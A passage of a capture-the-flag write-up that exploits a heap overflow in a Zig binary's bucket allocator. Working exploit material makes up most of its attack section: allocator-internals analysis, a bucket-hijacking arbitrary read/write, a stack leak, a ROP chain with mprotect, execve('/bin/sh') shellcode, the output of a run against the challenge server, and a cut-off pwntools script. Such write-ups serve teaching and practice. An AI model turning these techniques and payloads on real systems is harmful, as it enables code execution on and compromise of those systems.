class="keyword">self</span>.backing_allocator, <span class="number">1</span>);</span><br><span class="line">        <span class="keyword">const</span> slice = <span class="keyword">try</span> <span class="keyword">self</span>.backing_allocator.<span class="title function_ invoke__">rawAlloc</span>(len, ptr_align, len_align, ret_addr);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">const</span> gop = <span class="keyword">self</span>.large_allocations.<span class="title function_ invoke__">getOrPutAssumeCapacity</span>(@<span class="title function_ invoke__">ptrToInt</span>(slice.ptr));</span><br><span class="line">        <span class="title function_ invoke__">if</span> (config.retain_metadata and !config.never_unmap) &#123;</span><br><span class="line">            <span class="comment">// Backing allocator may be reusing memory that we&#x27;re retaining metadata for</span></span><br><span class="line">            <span class="title function_ invoke__">assert</span>(!gop.found_existing or gop.value_ptr.freed);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="title function_ invoke__">assert</span>(!gop.found_existing); <span class="comment">// This would mean the kernel double-mapped pages.</span></span><br><span class="line">        &#125;</span><br><span class="line">        gop.value_ptr.bytes = slice;</span><br><span class="line">        <span class="title function_ invoke__">if</span> (config.enable_memory_limit)</span><br><span class="line">            gop.value_ptr.requested_size = len;</span><br><span class="line">        gop.value_ptr.<span class="title function_ invoke__">captureStackTrace</span>(ret_addr, .alloc);</span><br><span class="line">        <span class="title function_ invoke__">if</span> (config.retain_metadata) &#123;</span><br><span class="line">            gop.value_ptr.freed = <span class="literal">false</span>;</span><br><span class="line">            <span class="title function_ invoke__">if</span> (config.never_unmap) &#123;</span><br><span class="line">                gop.value_ptr.ptr_align = ptr_align;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="title function_ invoke__">if</span> (config.verbose_log) &#123;</span><br><span class="line">            log.<span class="title function_ invoke__">info</span>(<span class="string">&quot;large alloc &#123;d&#125; bytes at &#123;*&#125;&quot;</span>, .&#123; slice.len, slice.ptr &#125;);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> slice;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">const</span> new_size_class = math.<span class="title function_ invoke__">ceilPowerOfTwoAssert</span>(<span class="type">usize</span>, new_aligned_size);</span><br><span class="line">    <span class="keyword">const</span> ptr = <span class="keyword">try</span> <span class="keyword">self</span>.<span class="title function_ invoke__">allocSlot</span>(new_size_class, ret_addr);</span><br><span class="line">    <span class="title function_ invoke__">if</span> (config.verbose_log) &#123;</span><br><span class="line">        log.<span class="title function_ invoke__">info</span>(<span class="string">&quot;small alloc &#123;d&#125; bytes at &#123;*&#125;&quot;</span>, .&#123; len, ptr &#125;);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> ptr[<span class="number">0</span>..len];</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>First in <code>alloc</code>, if the aligned size is not larger than the largest bucket capacity (2**11) it will call <code>allocSlot</code>.</p>
<figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">fn</span> <span class="title function_">allocSlot</span>(<span class="keyword">self</span>: *<span class="keyword">Self</span>, size_class: <span class="type">usize</span>, trace_addr: <span class="type">usize</span>) Error![*]<span class="type">u8</span> &#123;</span><br><span class="line">    <span class="keyword">const</span> bucket_index = math.<span class="title function_ invoke__">log2</span>(size_class);</span><br><span class="line">    <span class="keyword">const</span> first_bucket = <span class="keyword">self</span>.buckets[bucket_index] orelse <span class="keyword">try</span> <span class="keyword">self</span>.<span class="title function_ invoke__">createBucket</span>(</span><br><span class="line">        size_class,</span><br><span class="line">        bucket_index,</span><br><span class="line">    );</span><br><span class="line">    var bucket = first_bucket;</span><br><span class="line">    <span class="keyword">const</span> slot_count = @<span class="title function_ invoke__">divExact</span>(page_size, size_class);</span><br><span class="line">    <span class="title function_ invoke__">while</span> (bucket.alloc_cursor == slot_count) &#123;</span><br><span class="line">        <span class="keyword">const</span> prev_bucket = bucket;</span><br><span class="line">        bucket = prev_bucket.next;</span><br><span class="line">        <span class="title function_ invoke__">if</span> (bucket == first_bucket) &#123;</span><br><span class="line">            <span class="comment">// make a new one</span></span><br><span class="line">            bucket = <span class="keyword">try</span> <span class="keyword">self</span>.<span class="title function_ invoke__">createBucket</span>(size_class, bucket_index);</span><br><span class="line">            bucket.prev = prev_bucket;</span><br><span class="line">            bucket.next = prev_bucket.next;</span><br><span class="line">            prev_bucket.next = bucket;</span><br><span class="line">            bucket.next.prev = bucket;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// change the allocator&#x27;s current bucket to be this one</span></span><br><span class="line">    <span class="keyword">self</span>.buckets[bucket_index] = bucket;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">const</span> slot_index = bucket.alloc_cursor;</span><br><span class="line">    bucket.alloc_cursor += <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line">    var used_bits_byte = bucket.<span class="title function_ invoke__">usedBits</span>(slot_index / <span class="number">8</span>);</span><br><span class="line">    <span class="keyword">const</span> used_bit_index: u3 = @<span class="title function_ invoke__">intCast</span>(u3, slot_index % <span class="number">8</span>); <span class="comment">// TODO cast should be unnecessary</span></span><br><span class="line">    used_bits_byte.* |= (@<span class="title function_ invoke__">as</span>(<span class="type">u8</span>, <span class="number">1</span>) &lt;&lt; used_bit_index);</span><br><span class="line">    bucket.used_count += <span class="number">1</span>;</span><br><span class="line">    bucket.<span class="title function_ invoke__">captureStackTrace</span>(trace_addr, size_class, slot_index, .alloc);</span><br><span class="line">    <span class="keyword">return</span> bucket.page + slot_index * size_class;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>allocSlot</code> will check if the current bucket is able to allocate one more object, else it will iterate through the doubly linked list to look for a not full bucket.<br>And if it does nto find one, it creates a new bucket. When the bucket is allocated, it returns the available objet at <code>bucket.page + slot_index * size_class</code>.</p>
<p>As you can see, the <code>BucketHeader</code> is structured like below in the <code>createBucket</code> function:</p>
<figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">fn</span> <span class="title function_">createBucket</span>(<span class="keyword">self</span>: *<span class="keyword">Self</span>, size_class: <span class="type">usize</span>, bucket_index: <span class="type">usize</span>) Error!*BucketHeader &#123;</span><br><span class="line">    <span class="keyword">const</span> page = <span class="keyword">try</span> <span class="keyword">self</span>.backing_allocator.<span class="title function_ invoke__">allocAdvanced</span>(<span class="type">u8</span>, page_size, page_size, .exact);</span><br><span class="line">    errdefer <span class="keyword">self</span>.backing_allocator.<span class="title function_ invoke__">free</span>(page);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">const</span> bucket_size = <span class="title function_ invoke__">bucketSize</span>(size_class);</span><br><span class="line">    <span class="keyword">const</span> bucket_bytes = <span class="keyword">try</span> <span class="keyword">self</span>.backing_allocator.<span class="title function_ invoke__">allocAdvanced</span>(<span class="type">u8</span>, @<span class="title function_ invoke__">alignOf</span>(BucketHeader), bucket_size, .exact);</span><br><span class="line">    <span class="keyword">const</span> ptr = @<span class="title function_ invoke__">ptrCast</span>(*BucketHeader, bucket_bytes.ptr);</span><br><span class="line">    ptr.* = BucketHeader&#123;</span><br><span class="line">        .prev = ptr,</span><br><span class="line">        .next = ptr,</span><br><span class="line">        .page = page.ptr,</span><br><span class="line">        .alloc_cursor = <span class="number">0</span>,</span><br><span class="line">        .used_count = <span class="number">0</span>,</span><br><span class="line">    &#125;;</span><br><span class="line">    <span class="keyword">self</span>.buckets[bucket_index] = ptr;</span><br><span class="line">    <span class="comment">// Set the used bits to all zeroes</span></span><br><span class="line">    @<span class="title function_ invoke__">memset</span>(@<span class="title function_ invoke__">as</span>(*[<span class="number">1</span>]<span class="type">u8</span>, ptr.<span class="title function_ invoke__">usedBits</span>(<span class="number">0</span>)), <span class="number">0</span>, <span class="title function_ invoke__">usedBitsCount</span>(size_class));</span><br><span class="line">    <span class="keyword">return</span> ptr;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>It allocates a page to store objects in, then it allocates the <code>BucketHeader</code> itself. Note that the page allocator will make allocations adjacent from each other. According to my several experiments the allocations grow – from an initial given mapping – to lower or higher addresses. I advice you to try different order of allocations in gdb to figure out this.</p>
<p>Let’s quickly decribe each field of the <code>BucketHeader</code>:</p>
<ul>
<li><code>.prev</code> and <code>.next</code> keep track of the doubly linked list that links buckets of same size.</li>
<li><code>.page</code> contains the base address of the page that contains the objects that belong to the bucket.</li>
<li><code>alloc_cursor</code> contains the number of allocated objects.</li>
<li><code>used_count</code> contains the number of currently used objects.</li>
</ul>
<h2 id="Getting-read-write-what-were-primitive"><a href="#Getting-read-write-what-were-primitive" class="headerlink" title="Getting read &#x2F; write what were primitive"></a>Getting read &#x2F; write what were primitive</h2><p>Well, the goal is to an arbitrary read &#x2F; write by hiijacking the <code>.page</code> and <code>.alloc_cursor</code> fields of the <code>BucketHeader</code>, this way if we hiijack pointers from a currently used bucket for a given size we can get a chunk toward any location. </p>
<p>What we can do to get a chunk close to a  <code>BucketHeader</code> structure would be:</p>
<ul>
<li>Allocate large (<code>0x500-1</code>) chunk, <code>0x800</code> bucket.</li>
<li>Allocate 4 other chunks of size <code>1000</code>, which end up in the <code>0x400</code> bucket.</li>
</ul>
<p>Thus, first one page has been allocated to satisfy request one, then another page right after the other has been allocated to store the <code>BucketHeader</code> for this bucket.<br>Then, to satisfy the four next allocations, the page that stores the objects has been allocated right after the one which stores the <code>BucketHeader</code> of the <code>0x800</code>-bucket, and finally a page is allocated to store the <code>BucketHeader</code> of the <code>0x400</code> bucket.</p>
<p>If you do not understand clearly, I advice you to debug my exploit in <code>gdb</code> by looking at the <code>chunklist</code>.</p>
<p>With this process the last allocated <code>0x400</code>-sized chunk gets allocated <code>0x400</code> bytes before the <code>BucketHeader</code> of the bucket that handles <code>0x400</code>-sized chunks.<br>Thus to get a read &#x2F; write what were we can simply trigger the heap overflow with the <code>edit</code> function to null out <code>.alloc_cursor</code> and <code>.used_count</code> and replace <code>.page</code> by the target location.<br>This way the next allocation that will request <code>0x400</code> bytes, which will trigger the hiijacked bucket and return the target location giving us the primitive.</p>
<p>Which gives:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">alloc(<span class="number">0</span>, <span class="number">0x500</span>-<span class="number">1</span>, <span class="string">b&quot;A&quot;</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span class="number">5</span>):</span><br><span class="line">    alloc(i, <span class="number">1000</span>, <span class="string">b&quot;vv&quot;</span>)</span><br><span class="line"></span><br><span class="line">edit(<span class="number">4</span>, <span class="number">0x400</span> + <span class="number">5</span>*<span class="number">8</span>, <span class="string">b&quot;X&quot;</span>*<span class="number">0x400</span> \ <span class="comment"># padding</span></span><br><span class="line">     + pwn.p64(<span class="number">0x208000</span>)*<span class="number">3</span> \ <span class="comment"># next / prev + .page point toward the target =&gt; 0x208000</span></span><br><span class="line">     + pwn.p64(<span class="number">0x0</span>) \ <span class="comment"># .alloc_cursor &amp; .used_count</span></span><br><span class="line">     + pwn.p64(<span class="number">0</span>)) <span class="comment"># used bits</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># next alloc(1000) will trigger the write what were</span></span><br></pre></td></tr></table></figure>

<h2 id="Leak-stack"><a href="#Leak-stack" class="headerlink" title="Leak stack"></a>Leak stack</h2><p>To leak the stack I leaked the <code>argv</code> variable that contains a pointer toward arguments given to the program, stored on the stack. That’s a reliable leak given it’s a known and fixed location, which can base used as a base compared with function’s stackframes. </p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">alloc(<span class="number">5</span>, <span class="number">1000</span>, <span class="string">b&quot;A&quot;</span>) <span class="comment"># get chunk into target location (0x208000)</span></span><br><span class="line">show(<span class="number">5</span>)</span><br><span class="line">io.recv(<span class="number">0x100</span>) <span class="comment"># argv is located at 0x208000 + 0x100</span></span><br><span class="line"></span><br><span class="line">stack = pwn.u64(io.recv(<span class="number">8</span>))</span><br><span class="line">pwn.log.info(<span class="string">f&quot;stack: <span class="subst">&#123;<span class="built_in">hex</span>(stack)&#125;</span>&quot;</span>)</span><br></pre></td></tr></table></figure>

<h2 id="ROP"><a href="#ROP" class="headerlink" title="ROP"></a>ROP</h2><p>Now we’re able to overwrite whatever function’s stackframe, we have to find one that returns from context of <code>std.fs.file.File.read</code> that reads the user input to the chunk. But unlucky functions like <code>add</code>, <code>edit</code> are inlined in the <code>main</code> function. Moreover we cannot overwrite the return address of the <code>main</code> function given that the exit handler call directly exit. Which means we have to corrput the stackframe of the <code>std.fs.file.File.read</code> function called in the <code>edit</code> function.<br>But the issue is that between the call to <code>SYS_read</code> within <code>std.fs.file.File.read</code> and the end of the function, variables that belong to the calling function’s stackframe are edited, corrupting the ROPchain. So what I did is using this gadget to reach a part of the stack that will not be corrupted:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0x0000000000203715 : add rsp, 0x68 ; pop rbx ; pop r14 ; ret</span><br></pre></td></tr></table></figure>

<p>With the use of this gadget I’m able to pop a few QWORD from the stack to reach another area of the stack where I write my ROPchain.<br>The goal for the ROPchain is to <code>mptotect</code> a shellcode and then jump on it. The issue is that I didn’t find a gadget to control the value of the <code>rdx</code> register but when it returns from <code>std.fs.file.File.read</code> it contains the value of size given to <code>edit</code>. So to call <code>mprotect(rdi=0x208000, rsi=0x1000, rdx=0x7)</code> we have to call <code>edit</code> with a size of <code>7</code> to write on the <code>std.fs.file.File.read</code> saved RIP the value of the magic gadget seen previously.</p>
<p>Here is the ROPchain:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">edit(<span class="number">4</span>, <span class="number">0x400</span> + <span class="number">5</span>*<span class="number">8</span>, <span class="string">b&quot;A&quot;</span>*<span class="number">0x400</span> + pwn.p64(<span class="number">0x208000</span>)*<span class="number">3</span> + pwn.p64(<span class="number">0x000</span>) + pwn.p64(<span class="number">0</span>))</span><br><span class="line"><span class="comment"># with the use of the write what were we write the shellcode at 0x208000</span></span><br><span class="line"></span><br><span class="line">shellcode = <span class="string">b&quot;\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05&quot;</span></span><br><span class="line"><span class="comment"># execve(&quot;/bin/sh&quot;, NULL, NULL)</span></span><br><span class="line"></span><br><span class="line">alloc(<span class="number">14</span>, <span class="number">1000</span>, shellcode)</span><br><span class="line"></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">0x0000000000201fcf : pop rax ; syscall</span></span><br><span class="line"><span class="string">0x0000000000203147 : pop rdi ; ret</span></span><br><span class="line"><span class="string">0x000000000020351b : pop rsi ; ret</span></span><br><span class="line"><span class="string">0x00000000002035cf : xor edx, edx ; mov rsi, qword ptr [r9] ; xor eax, eax ; syscall</span></span><br><span class="line"><span class="string">0x0000000000201e09 : ret</span></span><br><span class="line"><span class="string">0x0000000000203715 : add rsp, 0x68 ; pop rbx ; pop r14 ; ret</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"></span><br><span class="line">edit(<span class="number">4</span>, <span class="number">0x400</span> + <span class="number">5</span>*<span class="number">8</span>, <span class="string">b&quot;A&quot;</span>*<span class="number">0x400</span> + pwn.p64(stack-<span class="number">0x50</span>)* <span class="number">3</span> + pwn.p64(<span class="number">0</span>) + pwn.p64(<span class="number">0</span>))</span><br><span class="line"><span class="comment"># write ROPchain into the safe area on the stack </span></span><br><span class="line">alloc(<span class="number">11</span>, <span class="number">0x400</span>, pwn.p64(<span class="number">0x203147</span>) \ <span class="comment"># pop rdi ; ret</span></span><br><span class="line">        + pwn.p64(<span class="number">0x208000</span>) + \ <span class="comment"># target area for the shellcode</span></span><br><span class="line">        pwn.p64(<span class="number">0x20351b</span>) + \ <span class="comment"># pop rsi ; ret</span></span><br><span class="line">        pwn.p64(<span class="number">0x1000</span>) + \ <span class="comment"># length</span></span><br><span class="line">        pwn.p64(<span class="number">0x201fcf</span>) + \ <span class="comment"># pop rax ; syscall</span></span><br><span class="line">        pwn.p64(<span class="number">0xa</span>) + \ <span class="comment"># SYS_mprotect</span></span><br><span class="line">        pwn.p64(<span class="number">0x208000</span>)) <span class="comment"># jump on the shellcode + PROFIT</span></span><br><span class="line"></span><br><span class="line">edit(<span class="number">4</span>, <span class="number">0x400</span> + <span class="number">5</span>*<span class="number">8</span>, <span class="string">b&quot;A&quot;</span>*<span class="number">0x400</span> + pwn.p64(stack-<span class="number">0xd0</span>)* <span class="number">3</span> + pwn.p64(<span class="number">0</span>) + pwn.p64(<span class="number">0</span>))</span><br><span class="line"></span><br><span class="line">alloc(<span class="number">12</span>, <span class="number">1000</span>, pwn.p64(<span class="number">0x202d16</span>)) <span class="comment"># valid return address</span></span><br><span class="line">edit(<span class="number">12</span>, <span class="number">0x7</span>, pwn.p64(<span class="number">0x0000000000203715</span>)) <span class="comment"># magic gadget</span></span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="PROFIT"><a href="#PROFIT" class="headerlink" title="PROFIT"></a>PROFIT</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">nasm@off:~/Documents/pwn/corCTF/zieg$ python3 remote.py REMOTE HOST=be.ax PORT=31278</span><br><span class="line">[*] &#x27;/home/nasm/Documents/pwn/corCTF/zieg/zigzag&#x27;</span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    No RELRO</span><br><span class="line">    Stack:    No canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE (0x200000)</span><br><span class="line">[+] Opening connection to be.ax on port 31278: Done</span><br><span class="line">[*] stack: 0x7ffc2ca48ae8</span><br><span class="line">[*] Loaded 37 cached gadgets for &#x27;zigzag&#x27;</span><br><span class="line">[*] Using sigreturn for &#x27;SYS_execve&#x27;</span><br><span class="line">[*] Switching to interactive mode</span><br><span class="line">$ id</span><br><span class="line">uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)</span><br><span class="line">$ ls</span><br><span class="line">flag.txt</span><br><span class="line">zigzag</span><br><span class="line">$ cat flag.txt</span><br><span class="line">corctf&#123;bl4Z1nGlY_f4sT!!&#125;</span><br></pre></td></tr></table></figure>

<h2 id="Appendices"><a href="#Appendices" class="headerlink" title="Appendices"></a>Appendices</h2><p>Final exploit:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># this exploit was generated via</span></span><br><span class="line"><span class="comment"># 1) pwntools</span></span><br><span class="line"><span class="comment"># 2) ctfmate</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> pwn</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># Set up pwntools for the correct architecture</span></span><br><span class="line">exe = pwn.context.binary = pwn.ELF(<span class="string">&#x27;zigzag&#x27;</span>)</span><br><span class="line"><span class="comment"># pwn.context.terminal = [&#x27;tmux&#x27;, &#x27;new-window&#x27;] </span></span><br><span class="line">pwn.context.delete_corefiles = <span class="literal">True</span></span><br><span class="line">pwn.context.rename_corefiles = <span class="literal">False</span></span><br><span class="line"></span><br><span class="line">host = pwn.args.HOST <span class="keyword">or</span> <span class="string">&#x27;127.0.0.1&#x27;</span></span><br><span class="line">port = <span class="built_in">int</span>(pwn.args.PORT <span class="keyword">or</span> <span class="number">1337</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">local</span>(<span class="params">argv=[], *a, **kw</span>):</span><br><span class="line">    <span class="string">&#x27;&#x27;&#x27;Execute the target binary locally&#x27;&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">if</span> pwn.args.GDB:</span><br><span class="line">        <span class="keyword">return</span> pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> pwn.process([exe.path] + argv, *a, **kw)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">remote</span>(<span class="params">argv=[], *a, **kw</span>):</span><br><span class="line">    <span class="string">&#x27;&#x27;&#x27;Connect to the process on the remote host&#x27;&#x27;&#x27;</span></span><br><span class="line">    io = pwn.connect(host, port)</span><br><span class="line">    <span class="keyword">if</span> pwn.args.GDB:</span><br><span class="line">        pwn.gdb.attach(io, gdbscript=gdbscript)</span><br><span class="line">    <span class="keyword">return</span> io</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">start</span>(<span class="params">argv=[], *a, **kw</span>):</span><br><span class="line">    <span class="string">&#x27;&#x27;&#x27;Start the exploit against the target.&#x27;&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">if</span> pwn.args.LOCAL:</span><br><span class="line">        <span class="keyword">return</span> local(argv, *a, **kw)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> remote(argv, *a, **kw)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">gdbscript = <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">source ~/Downloads/pwndbg/gdbinit.py</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span>.<span class="built_in">format</span>(**<span class="built_in">locals</span>())</span><br><span class="line"></span><br><span class="line">io = <span class="literal">None</span></span><br><span class="line"></span><br><span class="line">io = start()</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">alloc</span>(<span class="params">idx, size, data</span>):</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;&gt; &quot;</span>, <span class="string">b&quot;1&quot;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;Index: &quot;</span>, <span class="built_in">str</span>(idx).encode())</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;Size: &quot;</span>, <span class="built_in">str</span>(size).encode())</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;Data: &quot;</span>, data)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>(<span class="params">idx</span>):</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;&gt; &quot;</span>, <span class="string">b&quot;2&quot;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;Index: &quot;</span>, <span class="built_in">str</span>(idx).encode())</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>(<span class="params">idx</span>):</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;&gt; &quot;</span>, <span class="string">b&quot;3&quot;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;Index: &quot;</span>, <span class="built_in">str</span>(idx).encode())</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params">idx, size, data</span>):</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;&gt; &quot;</span>, <span class="string">b&quot;4&quot;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;Index: &quot;</span>, <span class="built_in">str</span>(idx).encode())</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;Size: &quot;</span>, <span class="built_in">str</span>(size).encode())</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;Data: &quot;</span>, data)</span><br><span class="line"></span><br><span class="line">alloc(<span class="number">0</span>, <span class="number">0x500</span>-<span class="number">1</span>, <span class="string">b&quot;A&quot;</span>)</span><br><span class="line"><span class="keyword">for</span> i <span 